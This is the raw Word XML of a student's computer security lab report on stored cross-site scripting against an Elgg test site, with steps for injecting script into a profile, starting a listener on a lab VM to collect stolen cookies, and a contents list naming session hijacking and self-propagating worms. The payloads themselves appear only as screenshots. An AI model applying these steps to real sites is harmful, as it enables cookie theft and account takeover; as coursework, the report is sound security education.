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D529F" w14:textId="05473D70" w:rsidR="000C1352" w:rsidRPr="00E1187E" w:rsidRDefault="00DD6CD6" w:rsidP="00E1187E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc89727051"/>
      <w:r w:rsidRPr="00E1187E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Final </w:t>
      </w:r>
      <w:r w:rsidR="000C1352" w:rsidRPr="00E1187E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Project</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="1282AC74" w14:textId="424B66F7" w:rsidR="00DD6CD6" w:rsidRDefault="0001649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bookmarkStart w:id="1" w:name="_Hlk80824642"/>
      <w:bookmarkEnd w:id="1"/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am: Enze Xu (Individual)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D259925" w14:textId="61B9F349" w:rsidR="00016499" w:rsidRDefault="0001649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ue: Dec. 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00016499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14:paraId="35B72464" w14:textId="5C2F16BF" w:rsidR="00016499" w:rsidRDefault="0001649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epo</w:t>
      </w:r>
      <w:r w:rsidR="00DF49E7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>sitor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history="1">
        <w:r w:rsidRPr="0079784B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/EnzeXu/Computer_Security_Enze_Xu_Final_Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="51B1A32F" w14:textId="4D6B9348" w:rsidR="00016499" w:rsidRPr="00352EF3" w:rsidRDefault="0001649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A27BB91" w14:textId="54E0EB3B" w:rsidR="00DF49E7" w:rsidRDefault="00E1187E">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="8296"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:smallCaps/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:smallCaps/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:smallCaps/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc89727051" w:history="1">
        <w:r w:rsidR="00DF49E7" w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Final Project</w:t>
        </w:r>
        <w:r w:rsidR="00DF49E7">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DF49E7">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DF49E7">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc89727051 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DF49E7">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DF49E7">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00DF49E7">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="00DF49E7">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="315365C5" w14:textId="4FADEF74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2" w:history="1">
        <w:r w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.1 Task 1: Posting a Malicious Message to Display an Alert Wind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77403F7" w14:textId="47FC253A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3" w:history="1">
        <w:r w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.2 Task 2: Posting a Malicious Message to Display Cook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C90CEB" w14:textId="6502EB58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4" w:history="1">
        <w:r w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.3 Task 3: Stealing Cookies from the Victim’s Mach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018CAF" w14:textId="64ED4AD3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5" w:history="1">
        <w:r w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.4 Task 4: Session Hijacking using the Stolen Cook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7ECBF9" w14:textId="1A60E30C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6" w:history="1">
        <w:r w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.5 Task 5: Writing an XSS Wo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D63E459" w14:textId="79673FFA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7" w:history="1">
        <w:r w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.6 Task 6: Writing a Self-Propagating XSS Wo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C3C22D0" w14:textId="36252EE1" w:rsidR="00DF49E7" w:rsidRP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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc89727058" w:history="1">
        <w:r w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:noProof/>
          </w:rPr>
          <w:t>3.7 Task 7: Countermeas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A1088C3" w14:textId="31B03DD2" w:rsidR="00DF49E7" w:rsidRDefault="00DF49E7">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="underscore" w:pos="8296"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc89727059" w:history="1">
        <w:r w:rsidRPr="007C11A4">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Than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27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B88A914" w14:textId="575B7CC7" w:rsidR="00E1187E" w:rsidRDefault="00E1187E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="right" w:pos="8828"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:smallCaps/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:smallCaps/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FE000F" w14:textId="5554FD30" w:rsidR="00E1187E" w:rsidRPr="00E1187E" w:rsidRDefault="00E1187E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8820E0D" w14:textId="74AC1907" w:rsidR="00E1187E" w:rsidRDefault="00E1187E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9492858" w14:textId="7BE71810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B930D61" w14:textId="03752DEA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6F1E3C" w14:textId="5EE7AE6D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91B6223" w14:textId="2A90D10D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0B0AEC6" w14:textId="652DAD9B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469FEAF" w14:textId="115C3E38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ACB9821" w14:textId="0F97DCCB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FFE1111" w14:textId="60E1914A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88FB519" w14:textId="4C236B87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5E10605" w14:textId="24B0977B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5AFFCDD" w14:textId="6B846015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66EF80" w14:textId="17FEF4AB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AFCFE91" w14:textId="46BECE3A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0FA60D6" w14:textId="4061BC72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0873EEE" w14:textId="5F85D7F2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CBA548E" w14:textId="034A9146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EB3DB0E" w14:textId="34E7A3DF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866F30" w14:textId="016461BA" w:rsidR="00DF49E7" w:rsidRDefault="00DF49E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305D585" w14:textId="77777777" w:rsidR="00DF49E7" w:rsidRDefault="00DF49E7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77CD0E01" w14:textId="109F3ED1" w:rsidR="00E1187E" w:rsidRDefault="00E1187E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839948B" w14:textId="77777777" w:rsidR="00E1187E" w:rsidRPr="00016499" w:rsidRDefault="00E1187E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11F8D4D8" w14:textId="58F10FF4" w:rsidR="00123F24" w:rsidRPr="00E1187E" w:rsidRDefault="001055B9" w:rsidP="00E1187E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc89727052"/>
      <w:r w:rsidRPr="00E1187E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:r w:rsidR="00123F24" w:rsidRPr="00E1187E">
        <w:t>Task 1: Posting a Malicious Message to Display an Alert Window</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="04AF0137" w14:textId="39FCDAE5" w:rsidR="00764BF8" w:rsidRPr="00123F24" w:rsidRDefault="00171F0D" w:rsidP="00171F0D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a)</w:t>
      </w:r>
      <w:r w:rsidR="00764BF8" w:rsidRPr="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00123F24" w:rsidRPr="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Che</w:t>
      </w:r>
      <w:r w:rsidR="00123F24" w:rsidRPr="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ck </w:t>
      </w:r>
      <w:r w:rsidR="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidR="00123F24" w:rsidRPr="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the file </w:t>
      </w:r>
      <w:r w:rsidR="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00123F24" w:rsidRPr="00123F2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123F24" w:rsidRPr="00123F2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123F24" w:rsidRPr="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/apache2/sites-available/000-default.conf</w:t>
      </w:r>
      <w:r w:rsidR="00123F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” has been set correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D866ED" w14:textId="47408B7E" w:rsidR="00123F24" w:rsidRDefault="008407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8407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3437B2" wp14:editId="6C7A3D38">
            <wp:extent cx="2947608" cy="3215540"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 9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低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7794" cy="324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F1003" w14:textId="744721C2" w:rsidR="00450732" w:rsidRDefault="008407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644980">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Start apache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692F95E7" w14:textId="0864240B" w:rsidR="00123F24" w:rsidRDefault="0064498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64498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C778A4" wp14:editId="736BD95B">
            <wp:extent cx="4737100" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="15" name="图片 15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71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21614" w14:textId="45154B2B" w:rsidR="00123F24" w:rsidRDefault="0064498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Open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>firefo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owser and input “www.xsslabelgg.com”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765DE5E9" w14:textId="5051B2B0" w:rsidR="00123F24" w:rsidRDefault="0064498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64498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40DD68" wp14:editId="4D55B0CB">
            <wp:extent cx="4113525" cy="2592125"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="16" name="图片 1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形用户界面, 应用程序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5441" cy="259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0669" w14:textId="1A756F9D" w:rsidR="00123F24" w:rsidRPr="003316C6" w:rsidRDefault="003316C6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Log in as Alice and inject the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licious code into my profile</w:t>
      </w:r>
      <w:r w:rsidR="001055B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ri</w:t>
      </w:r>
      <w:r w:rsidR="001055B9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ef descrip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261D6A" w14:textId="23B51158" w:rsidR="00123F24" w:rsidRDefault="003316C6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3316C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4FE747" wp14:editId="3767C9CA">
            <wp:extent cx="5274310" cy="62738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D448E" w14:textId="3A46C1B6" w:rsidR="00123F24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After we click “save”, the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licious code will be immediately executed once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="512FE12A" w14:textId="72840CB0" w:rsidR="001055B9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11BA4D71" wp14:editId="4D55B0B2">
            <wp:extent cx="3177320" cy="2600077"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="24" name="图片 24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图形用户界面, 网站&#10;&#10;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2788" cy="265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AD069" w14:textId="612B3649" w:rsidR="003316C6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316C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) Then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3316C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">log in as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003316C6"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>, s</w:t>
      </w:r>
      <w:r w:rsidR="003316C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>earch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ing for</w:t>
      </w:r>
      <w:r w:rsidR="003316C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “Alice” in the search bar. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="003316C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="003316C6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> don’t need to add Alice as friend)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73275E83" w14:textId="050DAB97" w:rsidR="001055B9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1055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CBC67C" wp14:editId="329010F9">
            <wp:extent cx="4190337" cy="1017567"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="25" name="图片 25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图形用户界面, 应用程序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3378" cy="1020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C8550" w14:textId="57FF8E94" w:rsidR="001055B9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) The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licious code is executed again when we click into Alice’s profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44241E8E" w14:textId="6F909F83" w:rsidR="003316C6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1A446000" wp14:editId="64FA5461">
            <wp:extent cx="3176848" cy="2599690"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="23" name="图片 23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图形用户界面, 网站&#10;&#10;描述已自动生成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2246" cy="263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EB2BF" w14:textId="21167D82" w:rsidR="00123F24" w:rsidRDefault="00123F2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C69A4C7" w14:textId="4A73A6EE" w:rsidR="001055B9" w:rsidRPr="00123F24" w:rsidRDefault="001055B9" w:rsidP="00E1187E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc89727053"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00123F24">
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00123F24">
        <w:t xml:space="preserve">: Posting a Malicious Message to Display </w:t>
      </w:r>
      <w:r>
        <w:t>Cookies</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="1CE7454F" w14:textId="4526948D" w:rsidR="00123F24" w:rsidRPr="001055B9" w:rsidRDefault="001055B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) It is almost the same as what I did in Task 1. We </w:t>
      </w:r>
      <w:r w:rsidR="0054351F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>just need to inject the new code instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B41E1DB" w14:textId="7541254C" w:rsidR="00123F24" w:rsidRDefault="0054351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5F40BEB5" wp14:editId="098F2B03">
            <wp:extent cx="5274310" cy="869315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="26" name="图片 26" descr="图片包含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片包含 背景图案&#10;&#10;描述已自动生成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3FFCF" w14:textId="5471CDE2" w:rsidR="00123F24" w:rsidRDefault="00123F2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D15EF8C" w14:textId="75B741E3" w:rsidR="0054351F" w:rsidRDefault="0054351F" w:rsidP="0054351F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) Then again log i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 w:rsidR="00932EC0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and t</w:t>
      </w:r>
      <w:r w:rsidR="009F42ED">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hen we click into Alice’s profile and see what will happen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF42EFE" w14:textId="4951E7AC" w:rsidR="0054351F" w:rsidRDefault="00D07D5E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319EF4" wp14:editId="373E9FBA">
            <wp:extent cx="3954940" cy="2377440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="图片 2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图形用户界面, 应用程序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3593" cy="238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25F0" w14:textId="6692822A" w:rsidR="0054351F" w:rsidRDefault="0054351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22C955" w14:textId="2276E399" w:rsidR="00D07D5E" w:rsidRPr="00123F24" w:rsidRDefault="00D07D5E" w:rsidP="00E1187E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc89727054"/>
      <w:r>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00123F24">
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00123F24">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D07D5E">
        <w:t>Stealing Cookies from the Victim’s Machine</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="62227BE8" w14:textId="654C7697" w:rsidR="00D07D5E" w:rsidRDefault="0097230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r</w:t>
      </w:r>
      <w:r w:rsidR="0035410D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">stly use “git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="0035410D" w:rsidRPr="0079784B">
          <w:rPr>
            <w:rStyle w:val="ae"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://github.com/WFU-Alqahtani/final-project-xss-EnzeXu.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0035410D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” to clone the repo. Then use command “make” to make files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755CF4CF" w14:textId="5330E3FE" w:rsidR="0035410D" w:rsidRDefault="005E132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A75D5F" wp14:editId="6846FF68">
            <wp:extent cx="5080000" cy="2768600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29" name="图片 29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, 信件&#10;&#10;描述已自动生成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1E67" w14:textId="42BCEFE8" w:rsidR="0035410D" w:rsidRDefault="0035410D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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>) Start the listener on my seed16b VM (10.4.148.249)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1441F20A" w14:textId="4606AAE5" w:rsidR="00D07D5E" w:rsidRDefault="005E1322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5E132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B356AF" wp14:editId="6D1126B4">
            <wp:extent cx="4076700" cy="901700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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733B" w14:textId="25CB97E7" w:rsidR="0035410D" w:rsidRDefault="0035410D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5E1322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">On VM </w:t>
      </w:r>
      <w:r w:rsidR="005E1322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.4.148.249</w:t>
      </w:r>
      <w:r w:rsidR="005E1322">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00034357">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alice inputs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alicious code into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alice’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> profile: Brief description</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and click</w:t>
      </w:r>
      <w:r w:rsidR="0003435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6EB9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save</w:t>
      </w:r>
      <w:r w:rsidR="00BF6EB9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C686A3" w14:textId="7FA57E6E" w:rsidR="00D07D5E" w:rsidRDefault="0035410D" w:rsidP="0035410D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35410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AF0464A" wp14:editId="76801EAF">
            <wp:extent cx="5274310" cy="1481455"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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9B6E1" w14:textId="67E9B844" w:rsidR="00D07D5E" w:rsidRDefault="00D07D5E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4F0370" w14:textId="152D9541" w:rsidR="00D07D5E" w:rsidRDefault="000E34E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 Then Log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my seed16a VM (10.4.148.245) and click Alice’s profile again and again. See what will happen in the terminal on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>my se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16</w:t>
      </w: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VM (10.4.148.24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 first line is because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icked “save” at first and the malicious code will also </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
